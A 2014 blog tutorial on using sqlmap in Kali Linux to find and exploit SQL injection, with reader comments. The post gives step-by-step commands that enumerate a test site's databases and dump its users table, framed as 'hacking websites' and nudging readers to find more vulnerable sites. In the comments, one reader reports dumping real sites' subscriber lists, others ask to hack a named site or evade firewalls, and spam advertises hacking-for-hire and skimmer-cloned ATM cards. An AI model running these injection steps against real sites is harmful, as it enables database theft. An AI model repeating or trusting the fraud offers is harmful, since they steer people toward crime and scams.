Monday, March 31, 2014

Hacking Website with Sqlmap in Kali Linux

A screenshot from the SQLmap official website
In the previous tutorial, we hacked a website using nothing but a simple browser on a Windows machine. It was a pretty clumsy method to say the least. However, knowing the basics is necessary before we move on to the advanced tools. In this tutorial, we'll be using Kali Linux (see the top navigation bar to find how to install it if you haven't already) and SqlMap (which comes preinstalled in Kali) to automate what we manually did in the Manual SQL Injection tutorial to hack websites.




Now it is recommended that you go through the above tutorial once so that you can get an idea about how to find vulnerable sites. In this tutorial we'll skip the first few steps in which we find out whether a website is vulnerable or not, as we already know from the previous tutorial that this website is vulnerable.

Kali Linux

First off, you need to have Kali linux (or backtrack) up and running on your machine. Any other Linux distro might work, but you'll need to install Sqlmap on your own. Now if you don't have Kali Linux installed, you might want to go to this page, which will get you started on Beginner Hacking Using Kali Linux

Sqlmap


Basically its just a tool to make Sql Injection easier. Their official website  introduces the tool as -"sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections."
A lot of features can be found on the SqlMap website, the most important being - "Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems." That's basically all the database management systems. Most of the time you'll never come across anything other than MySql. 

Hacking Websites Using Sqlmap in Kali linux

Sql Version

Boot into your Kali linux machine. Start a terminal, and type -
sqlmap -h
It lists the basic commands that are supported by SqlMap. To start with, we'll execute a simple command
sqlmap -u <URL to inject>. In our case, it will be-
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
Sometimes, using the --time-sec helps to speed up the process, especially when the server responses are slow.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15
Either ways, when sqlmap is done, it will tell you the Mysql version and some other useful information about the database.
The final result of the above command should be something like this.
Note: Depending on a lot of factors, sqlmap my sometimes ask you questions which have to be answered in yes/no. Typing y means yes and n means no. Here are a few typical questions you might come across-
  • Some message saying that the database is probably Mysql, so should sqlmap skip all other tests and conduct mysql tests only. Your answer should be yes (y).
  • Some message asking you whether or not to use the payloads for specific versions of Mysql. The answer depends on the situation. If you are unsure, then its usually better to say yes.

Enumeration

Database

In this step, we will obtain database name, column names and other useful data from the database.
List of  a few common enumeration commands
So first we will get the names of available databases. For this we will add --dbs to our previous command. The final result will look like -
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
 So the two databases are acuart and information schema.

Table

Now we are obviously interested in acuart database. Information schema can be thought of as a default table which is present on all your targets, and contains information about structure of databases, tables, etc., but not the kind of information we are looking for. It can, however, be useful on a number of occasions. So, now we will specify the database of interest using -D and tell sqlmap to enlist the tables using --tables command. The final sqlmap command will be-
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
The result should be something like this -
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+
Now we have a list of tables. Following the same pattern, we will now get a list of columns.

Columns

Now we will specify the database using -D, the table using -T, and then request the columns using --columns. I hope you guys are starting to get the pattern by now. The most appealing table here is users. It might contain the username and passwords of registered users on the website (hackers always look for sensitive data).
The final command must be something like-
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
The result would resemble this-

Data

Now, if you were following along attentively, now we will be getting data from one of the columns. While that hypothesis is not completely wrong, its time we go one step ahead. Now we will be getting data from multiple columns. As usual, we will specify the database with -D, table with -T, and column with -C. We will get all data from specified columns using --dump. We will enter multiple columns and separate them with commas. The final command will look like this.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump
 Here's the result
John Smith, of course. And the password is test. Email is email@email.com?? Okay, nothing great, but in the real world web pentesting, you can come across more sensitive data. Under such circumstances, the right thing to do is mail the admin of the website and tell him to fix the vulnerability ASAP. Don't get tempted to join the dark side. You don't look pretty behind the bars. That's it for this tutorial. Try to look at other columns and tables and see what you can dig up. Take a look at the previous tutorial on Manual SQl Injection which will help you find more interesting vulnerable sites.

44 comments:

  1. hey saswat it seems you have moved to a new domain I don't see the blogspot in your url and it;s .tk domain so can you let me know how to migrate to .tk domain...I want to move it there too

    ReplyDelete
  2. nice articals...keep publishing...i will recommand your website in my youtube channel...i liked it verymuch

    ReplyDelete
  3. good :) hack the planet *_*

    ReplyDelete
  4. Can someone please revert the SQL data back to something other than Spanish profanities

    Thank you though :) Nice tutorial!!

    ReplyDelete
    Replies
    1. No longer like that... Now full of redirects to shady pr0n sites. Won't be demonstrating this one at school...

      Delete
  5. see the real hacking of admin of a website using SQL map
    It's better to see than to read and do. so click on
    https://www.youtube.com/watch?v=72Gi1oDkHdM

    ReplyDelete
  6. thanx bro teach more tutorial!........ i am waiting,,,

    ReplyDelete
  7. Why dont you teach the users advance levels of the Sql Map ? Anyways this was the simple and the best tutor i have ever seen Greets _ Alainhacker.CoM CreW !

    ReplyDelete
  8. Do you want to tell us that "We should try to be WHITE HAT HACKER not BLACK HAT HACKER"

    ReplyDelete
  9. --time-sec 15
    Could you please tell what this does? :)

    ReplyDelete
  10. WoW!
    Very nice tutorial , i like this website.

    ReplyDelete
  11. Hi any can make a video how to hack this website sopranonline.ddns.net ..

    ReplyDelete
  12. Fantastic stuff. Ran a check on a couple of websites and managed to find their entire subscribers list. I know nothing too serious but messaged them to inform them of the issues with their SQL being injectable.

    ReplyDelete
  13. if password is in this form 2384h2h2dfccd922fcs8oo2pv ?

    ReplyDelete
  14. if password is in this form 2384h2h2dfccd922fcs8oo2pv ?

    ReplyDelete
  15. Its a hashed password. Crack it with online cracking sites like crackstation

    ReplyDelete
  16. the user and password column is empty when i try to my website so please can you help me from that gab.

    thank you.

    ReplyDelete
  17. Hello!

    I'm not looking to hack a site. I'm looking to test if my website's company is vulnerable.

    So, I'm a little lost 'cause I can't find which commands to use.

    Probabily my website's company are secure, but for compliance issues, I have to execute a sql injection test in order to report if the website is secure or not.

    Where can I begin?

    ReplyDelete
    Replies
    1. Kali Linux official website, look at pentesting

      Delete
  18. What i do if a website does not have any sql vulnerabiltyvulnerabilty. I want hack a website without a sqlmap. I have tried it but does not worked

    ReplyDelete
    Replies
    1. =>If Website is not Vulnerable to Sql Injections,Try This

      https://www.owasp.org/index.php/Blind_SQL_Injection

      Delete
  19. =>Excellent job !Works Complete successfully
    =>Thanks BRO

    ReplyDelete
  20. Nice tutorial. Hacking with kali is more advanced than any other like sql injuction..etc
    A new version of kali is now available,better try it !!

    ReplyDelete
  21. Cool job you're doing in here bro 9ice tutorials i invited you to chat on google hangout. Thanks

    ReplyDelete
  22. Cool job you're doing in here bro 9ice tutorials i invited you to chat on google hangout. Thanks

    ReplyDelete
  23. when i tried sqlmap -u http://www.target.com. --time-sec 15 coomand against i got this warning GET parameter 'ID' is not injectable.

    ReplyDelete
    Replies
    1. That is because target.com is not vulnerable to an SQL injection. the url needs to have .php?= or something close to that

      Delete
  24. If you are looking for a professional hacker that specialize in school grade change ,,bank accounts and expunging criminal records...contact hackempire ASAP,he does over five school grades hack everyday...His job is secured and without trace...He helped me upgrade 3 of my courses .....He is really a programmer...you can contact him........hackempire007@gmail.com

    ReplyDelete
  25. Does anyone know how to bypass firewall of a website and then hack it?? Like the websites that have WAF or IPS/

    ReplyDelete
  26. I did what you just instructed and I am able to get the admin access. However, I have a question, how I will get the complete database? and how I will be able to extract on my computer?

    ReplyDelete
  27. Did we can use this attack on .org sites

    ReplyDelete
  28. Nice tutorial. I've found another tutorial that uses advance switches. You can check them at https://edricteo.com/sqlmap-commands/

    ReplyDelete
  29. PEOPLE ARE GETTING IN CONTACT WITH HACKERS TO HELP THEM EXPUNGE CRIMINAL RECORDS,ALL FORM OF UNIVERSITY UP GRADES,PREDICT THE STOCK MARKETS,CLEAR STUDENT LOANS AND OTHER DEBTS.FIX CREDIT RATING DOUBLE YOUR TAX RETURNS AND HACK BUSINESS COMPETITORS.HACK BANK ACCOUNTS,ALL FORM OF EMAILS AND WEBSITES,SPY ON CHEATING SPOUSE,MOBILE PHONES AND ALL FORM OF SOCIAL MEDIA HACKS:INSTAGRAM,TWITTER ETC, TRACKING DEVICE HACK.CONTACT: alibash4187@gmail.com

    ReplyDelete
  30. it shows host does not exist...what to do now ?

    ReplyDelete
  31. Do ATM Hacking Exist ?
    Yes, you can actually hack an atm and make it dispense free money but not with any trick like:
    ATM HACKING USING CANDLE WAX,HACKING ATM WITH USB,ATM HACKING USING IPHONE OR SAMSUNG GALAXY,ATM HACKING USING SIM CARD. ATM hacking does not involve any master passwords or hack codes.
    THE REAL ATM HACKING GUIDE.
    Now you might be wondering what’s the working method to hack atm. I will be explaining briefly on how an atm machine can be hacked but this is not for dummies. So at the end of this post you should decide whether to buy our blank atm cards or do the hack yourself.
    ATM hacking can be achieved using skimmers(atm keypad) which is mostly undetected. It is installed secretly on the atm and it will grab your card data once you slot in your card and enter your pin.
    Once the hacker has this data, your atm card can be cloned using a writer (MRS606) and some software.
    ATM HACKING- The blank atm card
    Blank atm cards with writer (mrs606)
    embossed atm cards
    If you want to do this on your own, it’s risky for a newbie. Think about the security camera on the atm and beside you haven’t done this before.
    OUR SERVICES
    We are a professional carding team with a large ring around the globe. With over 2 million ATM infected with our malware and skimmers, we can grab bank card data which include the track 1 and track 2 with the card pin. We in turn clone this cards using the grabbed data into real ATM cards which can be used to withdraw at the ATM or swipe at stores and POS. We sell this cards to all our customers and interested buyers worldwide, the card has a daily withdrawal limit of $2500 on ATM and up to $50,000 spending limit on in stores.
    Here is our price lists for the ATM CARDS :
    BALANCE: PRICE
    $10,000: $980
    $20,000: $1830
    $35,000: $2850
    $50,000: $4960
    $100,000: $9800
    The prices include the shipping fees and charges, order now: Contact us: atm.h@hackermail.com or atmhacking01@gmail.com
    FREQUENTLY ASKED QUESTIONS (FAQ)
    On the course of rendering this services, we have come across so many clients with different questions so this is aimed at answering few questions you might have:
    1: Are you selling money?
    No, we are not selling money. If you read our post correctly you will understand how this whole thing works.
    2: Is this service available for my country?
    Yes, our services are available worldwide
    3: How do i get my card after payments?
    We ship via DHL, standard shipping usually takes 7 days. All we need is your full name and address
    Order now, contact us with: atm.h@hackermail.com or atmhacking01@gmail.com

    ReplyDelete
  32. GET YOUR BLANK ATM CARD AND BE RICH FOREVER EMAIL: DICKSONBLANKATMHACKER@GMAIL.COM

    Alicia Orlando by name from USA.. i am here to share this message of greatness to only those who will seize the opportunity life will offer to become somebody great and actualize their dreams.so happy I got mine from Mr Dickson. My blank ATM card can withdraw 5000 dollars daily. I got it from Him last week and now I have 50000 dollars monthly. The blank ATM withdraws money from any ATM machines and there is no name on it, it is not traceable and now i have money for business and enough money for me and my family to live on .I am really happy i met Mr.Dickson because i met two people before him and they took my money not knowing that they were scams. But am happy now. Mr Dickson sent the card through UPS Express Delivery Shipment, and i got it in 4 days. Get your own card from him now he is not like other scammer pretending to have the ATM card,he is giving it out to help people even if it is illegal but it helps a lot and no one ever gets caught.Start living your big dreams, living that large and comfortable life that you always wised for, contact email: dicksonblankatmhacker@gmail.com cell whatsapp/ +12048178403 and make your purchase immediately.

    ReplyDelete

© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.
Bitcoin: 1B5aLqJcMW7zznffTxQwta8JTZsxBDPguC